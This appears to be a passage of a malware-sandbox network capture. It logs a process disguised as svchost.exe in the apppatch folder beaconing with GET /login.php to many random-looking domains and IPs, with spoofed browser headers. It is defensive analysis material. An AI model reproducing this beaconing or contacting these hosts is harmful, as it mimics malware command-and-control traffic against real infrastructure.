                                                                                                                                                                                                                  Location: https://lysyvan.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2XK%2BMnF7sNiYUe%2FjcQXZqMuhl00uhlxf8M%2FVu5UoT7vlyXLjYUxgQfozlvto9smQqs%2FAQ2qkmr4ufPXMJ2ZPOw3QVdQ6iRma6cLoBtBr14%2Fd8VI7IwaL9P%2FZ7%2Bi7wA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10202509fc7cac-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=966&recv_bytes=486&delivery_rate=1522074&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:50:52.300067902 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
Nov 11, 2024 18:50:52.661499977 CET | 978 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:52 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://lysyvan.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QNgRxi8fN4zf7vGaeTiE1E8IrmJrjeuMbrMQaZFBS4hpjBt6R%2BWjVn7AqhGvdX49X%2BwieJq%2B73kgObOJ8d0gJJ0NQFL34BekHzG1lZfoZl5wcxr1CFKuyLtMDV4Faw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10208918377cac-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1614&sent=9&recv=11&lost=0&retrans=0&sent_bytes=1950&recv_bytes=729&delivery_rate=2509532&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:50:54.863095045 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
Nov 11, 2024 18:50:55.237633944 CET | 979 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:55 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://lysyvan.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WDJMvl0svDdqsOf3nEPDc0w9VwTu88NCydkrxGhAhNWyLiSxf%2BONBazXFB26Nm0B8bcG783cw6GmNWB3G8JyvZ4%2FfU3bl7K%2B%2FluiW5ZURwAhEG699PD1THhmejhJXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020992f377cac-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1605&sent=13&recv=15&lost=0&retrans=0&sent_bytes=2928&recv_bytes=972&delivery_rate=2509532&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49745 | 18.208.156.248 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:33.853898048 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: pupycag.com
Nov 11, 2024 18:50:34.292576075 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=8d293bb926a50208151153d535bf67ed|66.23.206.109|1731347434|1731347434|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49746 | 3.94.10.34 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:33.890563011 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lygynud.com
Nov 11, 2024 18:50:34.316792965 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=28f9d138874c3d54e926818f975a604a|66.23.206.109|1731347434|1731347434|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 49753 | 103.150.10.48 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:34.553677082 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyrysor.com
Nov 11, 2024 18:50:35.422513008 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                  Server: openresty/1.15.8.1
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:35 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 151
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://106.15.232.163:8000/dh/147287063_377283.html#index8?d=lyrysor.com
                                                                                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:50:36.205785036 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyrysor.com
Nov 11, 2024 18:50:36.525111914 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                  Server: openresty/1.15.8.1
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:36 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 151
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://106.15.232.163:8000/dh/147287063_377283.html#index8?d=lyrysor.com
                                                                                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:50:52.262926102 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyrysor.com
Nov 11, 2024 18:50:52.549405098 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                  Server: openresty/1.15.8.1
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:52 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 151
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://106.15.232.163:8000/dh/147287063_377283.html#index8?d=lyrysor.com
                                                                                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:50:52.898982048 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyrysor.com
Nov 11, 2024 18:50:53.193872929 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                  Server: openresty/1.15.8.1
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:53 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 151
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://106.15.232.163:8000/dh/147287063_377283.html#index8?d=lyrysor.com
                                                                                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49759 | 106.15.232.163 | 8000 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:35.432241917 CET | 290 | OUT | GET /dh/147287063_377283.html HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: 106.15.232.163:8000
                                                                                                                                                                                                                  Connection: Keep-Alive
Nov 11, 2024 18:50:36.204205990 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: openresty/1.21.4.3
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:36 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 561
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:50:36.545608044 CET | 290 | OUT | GET /dh/147287063_377283.html HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: 106.15.232.163:8000
                                                                                                                                                                                                                  Connection: Keep-Alive
Nov 11, 2024 18:50:36.811590910 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: openresty/1.21.4.3
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:36 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 561
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:50:52.630358934 CET | 290 | OUT | GET /dh/147287063_377283.html HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: 106.15.232.163:8000
                                                                                                                                                                                                                  Connection: Keep-Alive
Nov 11, 2024 18:50:52.897447109 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: openresty/1.21.4.3
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:52 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 561
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:50:53.195024967 CET | 290 | OUT | GET /dh/147287063_377283.html HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: 106.15.232.163:8000
                                                                                                                                                                                                                  Connection: Keep-Alive
Nov 11, 2024 18:50:53.461175919 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: openresty/1.21.4.3
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:53 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 561
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49786 | 64.225.91.73 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:38.782397985 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galynuh.com
Nov 11, 2024 18:50:39.332880020 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  content-type: text/html
                                                                                                                                                                                                                  content-length: 593
                                                                                                                                                                                                                  last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                                  etag: "63f68860-251"
                                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                                  Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 49787 | 76.223.67.189 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:38.804157019 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qexyhuv.com
Nov 11, 2024 18:50:39.231462002 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: openresty
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 114
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 49793 | 44.221.84.105 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:39.028064966 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyciz.com
Nov 11, 2024 18:50:39.457639933 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=75e0b1516d38a999d6d8bc4a9b71df74|66.23.206.109|1731347439|1731347439|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 49794 | 103.224.212.210 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:39.092050076 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyxynyx.com
Nov 11, 2024 18:50:39.661348104 CET | 340 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  server: Apache
                                                                                                                                                                                                                  set-cookie: __tad=1731347439.3564880; expires=Thu, 09-Nov-2034 17:50:39 GMT; Max-Age=315360000
                                                                                                                                                                                                                  location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0450-39f1-837b-46255b9c1f17
                                                                                                                                                                                                                  content-length: 2
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  Data Raw: 0a 0a
                                                                                                                                                                                                                  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 49795 | 103.224.182.252 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:39.146969080 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vofycot.com
Nov 11, 2024 18:50:39.707452059 CET | 338 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  server: Apache
                                                                                                                                                                                                                  set-cookie: __tad=1731347439.2338786; expires=Thu, 09-Nov-2034 17:50:39 GMT; Max-Age=315360000
                                                                                                                                                                                                                  location: http://ww16.vofycot.com/login.php?sub1=20241112-0450-397d-84b8-860db74cb63b
                                                                                                                                                                                                                  content-length: 2
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  Data Raw: 0a 0a
                                                                                                                                                                                                                  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 49796 | 154.85.183.50 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:39.266263962 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyval.com
Nov 11, 2024 18:50:40.071571112 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:39 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 138
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  ETag: "663ee226-8a"
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:50:40.077390909 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyval.com
Nov 11, 2024 18:50:40.396037102 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:40 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 138
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  ETag: "663ee226-8a"
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:50:58.263794899 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyval.com
Nov 11, 2024 18:50:58.559613943 CET  307  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 138
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  ETag: "663ee226-8a"
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:50:58.589523077 CET  243  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyval.com
Nov 11, 2024 18:50:58.874177933 CET  307  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 138
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  ETag: "663ee226-8a"
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.6  49802        64.190.63.136   80                1112  C:\Windows\apppatch\svchost.exe
Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:50:40.043607950 CET  348  OUT  GET /login.php?sub1=20241112-0450-397d-84b8-860db74cb63b HTTP/1.1
